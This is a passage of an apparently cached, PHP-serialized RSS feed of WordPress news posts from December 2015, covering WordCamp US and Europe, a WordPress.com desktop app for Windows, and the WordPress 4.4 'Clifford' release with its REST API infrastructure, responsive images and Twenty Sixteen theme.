                                                                I was unable to attend this year’s event but I’ve already purchased my general admission ticket for 2016. If you have any inclination of going next year, grab your tickets now as they’re likely to sell out fast.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 10 Dec 2015 00:01:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"WPTavern: WordCamp US Sessions Are Now Available on WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49433\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"http://wptavern.com/wordcamp-us-sessions-are-now-available-on-wordpress-tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2084:\"

                                                                \"wordcamp-us-2015\"

                                                                \n

                                                                All of the sessions from WordCamp US 2015 are slowly making their way to WordPress.tv. If you weren’t able to attend the event, the good news is that you don’t have to miss out on any of the WordPress education. The sessions are packed full of knowledge and inspiration from some of the brightest minds in WordPress.

                                                                \n

                                                                I guarantee you will learn things in this talk by @tollmanz and @aaronjorbin. Watch it asap: https://t.co/p1MjrjKaa1 #wpFutureStack

                                                                \n

                                                                — Brian Krogsgard (@Krogsgard) December 9, 2015

                                                                \n

                                                                \n

                                                                Each session is listed on WordPress.tv with a link to its corresponding presentation slides, making it easy to follow along.

                                                                \n

                                                                So far half a dozen sessions are available and the rest will be trickling onto the site during the next few days. The WordCamp US Twitter account is tweeting out sessions as they arrive on WordPress.tv.

                                                                \n

                                                                Matt Mullenweg’s State of the Word address is also available. While our post covers the highlights, there are many more gems in his presentation.

                                                                \n

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 09 Dec 2015 23:39:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"WPTavern: Automattic Releases WordPress.com Desktop App for Windows\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49414\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"http://wptavern.com/automattic-releases-wordpress-com-desktop-app-for-windows\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1078:\"

                                                                Automattic, the parent company of WordPress.com, has released a Windows version of its desktop application. The app is free and works well on my Windows 7 64Bit machine.

                                                                \n

                                                                It looks and performs exactly the same as its Mac counterpart. This is to be expected as the interface is driven by JavaScript that communicates with the WordPress.com REST API.

                                                                \n\"WordPressWindowsDesktopApp\"WordPress.com Desktop App on Windows 7\n

                                                                It’s worth noting that the desktop apps don’t have as many features as the mobile apps. For example, you can’t moderate or manage comments. According to the development team, this is only the beginning and users can expect to see rapid iteration in the weeks to come.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 09 Dec 2015 22:45:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"WPTavern: WordCamp Europe 2016: Family Friendly with a Focus on Networking\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49412\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"http://wptavern.com/wordcamp-europe-2016-family-friendly-with-a-focus-on-networking\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4702:\"

                                                                \"wceu-2016\"

                                                                \n

                                                                WordCamp Europe 2016 organizers made 500 more tickets available this week after the first 1,000 sold out within three weeks of opening ticket sales. According to organizer Petya Raykovska, they are expecting 1700 attendees this year in Vienna, Austria.

                                                                \n

                                                                “We opened ticket sales more than seven months before the event and it’s going a lot better than expected,” she said. “Initially we prepared for 1200 attendees but the first 1,000 tickets were sold out in less than three weeks and luckily our venue capacity is much bigger this year so we will probably be able to do 1700.”

                                                                \n

                                                                In addition to gathering volunteers and getting sponsors for WCEU 2016, organizers are also doing a mentoring program for five different cities interested in hosting the next event. The call for applicants for 2017 will be open in two weeks.

                                                                \n

                                                                What to Expect at WCEU 2016: An Emphasis on Networking

                                                                \n

                                                                I caught up with Raykovska at WordCamp US and asked her if attendees can expect to have a European WordPress community summit attached to the event.

                                                                \n

                                                                “We are ready to organize a community summit in Europe before or after the WordCamp, but this is not our decision,” Raykovska said. “It has to be pre-approved by the Foundation and there is a team that has handled the summit so far. We are more than ready to host one if we are allowed.

                                                                \n

                                                                “WordCamp Europe will be in June, which is less than six months from the most recent community summit, so it might not be a perfect fit in terms of time frame but we are definitely ready to jump in and help organize a community summit in Europe when we get permission,” she said.

                                                                \n

                                                                Raykovska said that each year’s event is designed to be a unique experience for attendees, because WordCamps are so much more than simply attending sessions.

                                                                \n

                                                                “We are switching locations on purpose, not just to provide a chance for a new local community to host it each year but to make it more interesting for attendees, to make it a cultural experience,” she said.

                                                                \n

                                                                “Last year we did networking and speed networking – we put some effort into making sure people actually got to know each other and not just attend the conference to listen to talks. This year we are going to expand on that and organize some small warm-up events before the conference.

                                                                \n

                                                                “The idea is to help people make a connection,” Raykovska said. “We’re going to try to extend last year’s networking efforts and make sure that attendees meet as many other people as possible and not just stay in their small groups,” she said, emphasizing the importance of this aspect, as European communities are all different.

                                                                \n

                                                                A Family Friendly Event

                                                                \n

                                                                As the event is held during summer in the northern hemisphere, WordCamp Europe organizers recognize that many attendees may be traveling with their families.

                                                                \n

                                                                “We’re going to try to make the event a lot more family friendly,” Raykovska said. “We know that as the community grows, the people grow with it. There have been so many wonderful WordPress babies in the past year and we’ve noticed all of them. We want to make sure that when people travel they can bring their families along and it can be a good family experience as well.”

                                                                \n

                                                                A children’s museum is located right next door to the WordCamp venue with activities for all ages.

                                                                \n

                                                                “We’re trying to establish a connection with them and working to make sure that our space provides for families and people who want to bring their kids over and spend some quality time and also go listen to sessions,” she said. Childcare is a possibility they are considering.

                                                                \n

                                                                Only 228 tickets remain at this time and Raykovska said they’re disappearing fast. The demand for tickets is a testament to the quality of this event and its organizers. If you’re planning to attend WordCamp Europe 2016, don’t put off buying your ticket.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 09 Dec 2015 21:38:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"Post Status: Interview with Scott Taylor, WordPress 4.4 release lead — Draft Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=15182\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"https://poststatus.com/interview-with-scott-taylor-wordpress-4-4-release-lead-draft-podcast/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2049:\"

                                                                Welcome to the Post Status Draft podcast, which you can find on iTunesStitcher, and via RSS for your favorite podcatcher. Post Status Draft is hosted by Joe Hoyle — the CTO of Human Made — and myself.

                                                                \n

                                                                In this episode, Joe and I interview Scott Taylor, who works at The New York Times, is a WordPress Core Committer, and has lead the release of WordPress 4.4. We discuss dig into many WordPress 4.4 features, the thinking behind them, what it’s like to lead a release, and core development in general.

                                                                \n

                                                                We also talked about WordCamp US, where we recorded the podcast from, including Scott’s experience speaking during the State of the Word. After the interview with Scott, Joe and I dig more into the State of the Word and WordCamp US in general.

                                                                \n\nhttps://audio.simplecast.fm/22169.mp3\n

                                                                Direct Download

                                                                \n

                                                                The interview with Scott is first and Joe and I switch to WCUS and the State of the Word around 37 minutes in.

                                                                \n

                                                                Helpful links

                                                                \n\n

                                                                 

                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 09 Dec 2015 15:45:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"Matt: Wired in German\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=45694\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"http://ma.tt/2015/12/wired-in-german/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:329:\"

                                                                If you’re curious what I sound like in German, here’s an interview with the German version of Wired about the future of the web and WordPress, complete with a Gutenberg reference.

                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 09 Dec 2015 04:44:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"Post Status: WordPress 4.4, “Clifford”, released\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=15181\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"https://poststatus.com/wordpress-4-4/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:12631:\"

                                                                WordPress 4.4, “Clifford”, has just been released, right on the heels of WordCamp US — the largest WordPress conference ever. The release was led by Scott Taylor, and an astounding 466 people contributed to WordPress 4.4 — which is a record by a long shot.

                                                                \n

                                                                “Clifford” is named after Jazz trumpeter Clifford Brown. Check out his Wikipedia for more information about him.

                                                                \n

                                                                You can view all closed tickets for WordPress 4.4, and view an evolving overview of changes on the 4.4 Codex page as well.

                                                                \n

                                                                Here’s a video overview of WordPress 4.4:

                                                                \n


                                                                \n

                                                                \n

                                                                WordPress 4.4 includes a variety of user facing and developer features, and I consider it to be one of the most important releases for developers, and the way WordPress can be extended, in years.

                                                                \n

                                                                Let’s go over some of the most notable features in 4.4:

                                                                \n

                                                                WordPress REST API infrastructure

                                                                \n

                                                                \"banner-1544x500\"

                                                                \n

                                                                The WordPress REST API is going into WordPress core in multiple parts, starting with the infrastructure in 4.4. The endpoints will go in, “in a future release,” likely starting with endpoints for some core object types in 4.5, but full coverage may span multiple releases.

                                                                \n

                                                                The REST API has been widely covered, and was a focus area of the WordCamp US conference, but it is also a rapidly evolving part of WordPress. Decisions going into the REST API now will affect WordPress as a whole for many years.

                                                                \n

                                                                There are many reasons the API is going in infrastructure first, but one important reason is that the code going into core for 4.4 is quite isolated from the endpoints that are not going in yet. The infrastructure provides a lot of helpers for plugins to extend for supporting custom endpoints, while giving the REST API and core team more time to evolve the endpoints and work out a variety of remaining challenges.

                                                                \n

                                                                For people using the WordPress REST API feature plugin (version 2 or later), you’ll still want to have the plugin installed after updating to 4.4, as the plugin will continue to provide the endpoints that are already developed.

                                                                \n

                                                                The REST API infrastructure going into core is also a statement of core team endorsement, which the API needed after years of development, so that developers would be comfortable basing large projects on it, with the understanding that it would be supported for a long time.

                                                                \n

                                                                Amongst the challenges that remain for the REST API project is creating parity with the WordPress.com REST API. The WordPress.com REST API has been separately developed from the core REST API, but a number of important applications use the WordPress.com version, and both the core REST API team and key members at WordPress.com parent company Automattic believe it is in the best interest of both APIs for them to be interchangeable.

                                                                \n

                                                                Both APIs have made decisions that would require some sort of bridge or support-breaking versioning in order to get on the same page. Automattic has made resources available to work with the core team over coming months to help ensure that the two play nicely together.

                                                                \n

                                                                The REST API infrastructure hitting core is a huge milestone that will take WordPress to the next level. It’s more possible than ever for WordPress to be used as an application platform. It also means we will see more examples of websites using parts of WordPress and decoupling from other parts.

                                                                \n

                                                                The REST API is the work of dozens, but an enormous amount of credit is due to four people that have pushed this cart up the big hill of core inclusion: Ryan McCue and Rachel Baker have lead the project, and Joe Hoyle and Daniel Bachhuber have been hugely influential in code and architectural decisions.

                                                                \n

                                                                Interested in learning more about the WordPress REST API? Here are some links to help:

                                                                \n\n

                                                                Congratulations to everyone involved on making this important step to WordPress’s future.

                                                                \n

                                                                Responsive Images

                                                                \n

                                                                \"resp-images\"

                                                                \n

                                                                Another hugely important feature for WordPress 4.4 is the inclusion of the Responsive Images Community Group’s feature plugin, which is based on a specification now broadly supported in modern browsers.

                                                                \n

                                                                Project lead Joe McGill outlined how responsive images work, from a technical perspective, in a recent Make Core post. Essentially, WordPress now has support for dynamically replacing images for small viewports and for retina screens. The functionality operates on an underlying WordPress function that enables responsive images on new posts and old, both in the content and within most functions themes use to display images.

                                                                \n

                                                                You may wonder what images will be made available. At its core, the plugin puts all images that are the same aspect ratio as the requested image in the srcset. So if you insert a full size image and it is 1500×1500 and your large image size is 1024×1024 (the WordPress default), it would replace the full size with the large size for smaller viewports, because it is both smaller and it is the same aspect ratio.

                                                                \n

                                                                If an image isn’t the same aspect ratio, it wouldn’t be used; so it prevents, for example, an intended landscape image from being replaced by a vertically cropped image on a smaller screen. Because WordPress default images skip from 300px to 1024px, a new image size has been introduced to increase the likelihood one is available for use in the srcset. Any custom image sizes will be available as well.

                                                                \n

                                                                With this functionality, most images on every WordPress website in the world will be responsive-ready as soon as the sites are updated to WordPress 4.4. It’s a massive win for WordPress, as well as the broader web community.

                                                                \n

                                                                Term meta and taxonomy improvements

                                                                \n

                                                                WordPress 4.4 includes a long requested feature for terms with the introduction of term meta support. Term meta works much like post meta, and makes several new functions available: add_term_meta(), update_term_meta(), delete_term_meta(), and get_term_meta().

                                                                \n

                                                                Folks have used custom term meta for ages, but with core support, there’s now a standard way to enable developers to store arbitrary data to terms. Just like post meta, term meta can be abused, but when used smartly, it will increase the possibilities for complex websites that have complex post and term relationships. I also anticipate we’ll see helpers and user interfaces show up that make the process for registering meta fields and various form field types a simple process.

                                                                \n

                                                                In addition to term meta, 4.4 also introduces WP_Term. Developers won’t notice a big difference now, but as project lead Boone Gorges put it in the overview post, “in the future, WP_Term will allow for more extensive caching throughout the Taxonomy component, as well as the potential for method chaining and other developer conveniences.”

                                                                \n

                                                                oEmbed for WordPress posts

                                                                \n

                                                                \"wpoembed\"

                                                                \n

                                                                WordPress posts can now be embedded anywhere, with the new core WordPress supported oEmbed feature. Lead by new committer Pascal Birchler as a feature as plugin, oEmbed makes sharing a WordPress post as easy as putting the URL on its own line, just as if you were sharing a Tweet or other oEmbed provider piece of content.

                                                                \n

                                                                Twenty Sixteen

                                                                \n

                                                                \"twentysixteen\"

                                                                \n

                                                                Twenty Sixteen marks the seventh Twenty-series default WordPress theme. Twenty Sixteen is another minimalist WordPress theme with a focus on blogging. Its two most visible features are the negative margin large images in the content, and the support for nearly any color background.

                                                                \n

                                                                I think Twenty Sixteen is nice, but it isn’t groundbreaking theme territory. That may well change with Twenty Seventeen, which I imagine will have a larger JavaScript influence, but Twenty Sixteen is still a nice iteration on the WordPress default theme.

                                                                \n

                                                                Designed by Takashi Irie, you can find more about Twenty Sixteen on a Make Core internals post, its official WordPress.org theme page, view the demo, or see the development history on Github.

                                                                \n

                                                                WP_Comment and comments overhaul

                                                                \n

                                                                Comments were a bit of a mess in WordPress. Release lead Scott Taylor took this component under his wing for 4.4, and along with Rachel Baker (the component lead), revamped a lot of comment internals.

                                                                \n

                                                                Scott talked more about digging into WordPress comments in this week’s Post Status Draft podcast (posting soon).

                                                                \n

                                                                More Multisite goodies

                                                                \n

                                                                Just as I’ve said in 4.3, and previous releases, it makes me happy to repeat that Multisite continues to see active development.

                                                                \n

                                                                As Jeremy Felt outlines, WordPress 4.4 includes new support for WP_Network (that makes three new objects in 4.4 for those keeping count at home) as well as new network functions, actions, and filters.

                                                                \n

                                                                Another great WordPress release

                                                                \n

                                                                WordPress 4.4 is an outstanding release, and Release Lead Scott Taylor deserves a ton of credit for steering the ship. This release saw more overall commit activity than WordPress has seen in a single release in years.

                                                                \n

                                                                In addition to a lot of code improvements, many community members made incredible efforts to consistently garden Trac, where WordPress core development happens, and ensure that all tickets received at least some level of attention during the release phase of 4.4.

                                                                \n

                                                                Congratulations to everyone that received props, wrote docs, advocated for, or otherwise contributed to WordPress 4.4. It’s a great way to end the year for WordPress, and sets a path for a very exciting 2016 for the WordPress project.

                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 09 Dec 2015 00:18:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"WPTavern: WordPress 4.4 “Clifford” Featuring Responsive Images, Twenty Sixteen, and More\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49346\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"http://wptavern.com/wordpress-4-4-clifford-featuring-responsive-images-twenty-sixteen-and-more\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:9908:\"

                                                                After four months of intense development led by Scott Taylor, WordPress 4.4 “Clifford” named after jazz trumpeter Clifford Brown, is available for download. This release features responsive images, WordPress embeds, the Twenty Sixteen default theme, the first half of the REST API, and a host of small improvements.

                                                                \n

                                                                \n

                                                                Responsive Images

                                                                \n\"ResponsiveResponsive Images in WordPress 4.4\n

                                                                When users upload images to WordPress, it automatically crops them to smaller sizes. For example, if you upload an image that’s 1500 x 706, the image sizes might look like this:

                                                                \n
                                                                  \n
                                                                • Full Size – 1500 x 706
                                                                • \n
                                                                • Large – 500 x 235
                                                                • \n
                                                                • Medium – 300 x 141
                                                                • \n
                                                                • Thumbnail – 150 x 150
                                                                • \n
                                                                \n

                                                                WordPress 4.4 adds srcset and sizes support to WordPress. This allows the software to automatically use and display the right image based on a device’s screen size. If I attach a full size 1500 x 706 image to a post in WordPress 4.4 to be viewed on a desktop, mobile devices will see the large or medium-sized image instead.

                                                                \n

                                                                This decreases the amount of bandwidth used to load websites since smaller images have smaller file sizes. Responsive images don’t have any settings to configure as the magic happens behind the scenes.

                                                                \n

                                                                Embed WordPress Posts

                                                                \n

                                                                For a number of years, users have been able to embed content from trusted sources simply by pasting the URL into the visual editor. In 4.4, WordPress itself becomes a trusted oEmbed source which allows anyone to easily embed content from WordPress powered sites.

                                                                \n

                                                                Embedded content displays in an iframe with a link to comments, a share icon, and an excerpt of the post. Here’s an example of what an oEmbedded post from a site running WordPress 4.4 looks like.

                                                                \n

                                                                Feature Plugin Merge Proposal: oEmbed

                                                                \n

                                                                \n

                                                                If you want to disable the ability for people to embed your content, install and activate the Disable Embeds plugin. Disable Embeds does the following:

                                                                \n
                                                                  \n
                                                                • Prevents others from embedding your site.
                                                                • \n
                                                                • Prevents you from embedding other non-whitelisted sites.
                                                                • \n
                                                                • Disables all JavaScript related to the feature.
                                                                • \n
                                                                \n

                                                                WordPress embeds started off as a feature plugin proposal by Pascal Birchler. Check out ticket #32522 to see how it progressed from a proposal to a core feature.

                                                                \n

                                                                Phase One of the REST API

                                                                \n

                                                                WordPress 4.4 includes the first half of the REST API. The infrastructure portion of the API handles the routing, argument handling, JSON serialisation/deserialisation, status codes, and other items related to the API.

                                                                \n

                                                                Plugin and theme authors can start using the API immediately using the infrastructure in core to replace existing custom admin-ajax endpoints. To learn how to authenticate with the API, see this post by Ryan Mccue.

                                                                \n

                                                                Twenty Sixteen

                                                                \n

                                                                Twenty Sixteen is a new default theme designed by Takashi Irie, that was built with a mobile first, responsive approach. It has an optional right-hand sidebar and displays author information to the left of posts. It comes with four different color schemes, dark, gray, red, and yellow. Each scheme can be modified using the Customizer.

                                                                \n\"TwentyTwenty Sixteen Homepage\n

                                                                Other Noteworthy Changes

                                                                \n

                                                                WordPress Multisite

                                                                \n

                                                                WordPress Multisite has a new class called WP_Network. There’s also *_network_option functions which make it easier to use multiple networks. Jeremy Felt highlights new hooks added, bug fixes, and deprecated functions.

                                                                \n

                                                                WP_Comments Component is Rebuilt

                                                                \n

                                                                The comments component has undergone a substantial amount of work. The most noticeable difference is that the comment field displays first, followed by the Name, Email, and URL fields. This change improves navigation when using the keyboard to toggle through fields. It also makes it easier for users to leave comments.

                                                                \n\"CommentComment Text Area is First\n

                                                                Changes to the Headings Hierarchy on Admin Screens

                                                                \n

                                                                In an effort to improve accessibility, the headings hierarchy in the backend of WordPress 4.4 restores the H1 heading level to admin screens. This helps screen readers discern and locate important information on a page.

                                                                \n

                                                                Plugin and theme authors are highly encouraged to restructure their document headings hierarchy to ensure that heading levels are not skipped. Andrea Fercia explains why it matters and how to ensure you have the proper headings.

                                                                \n

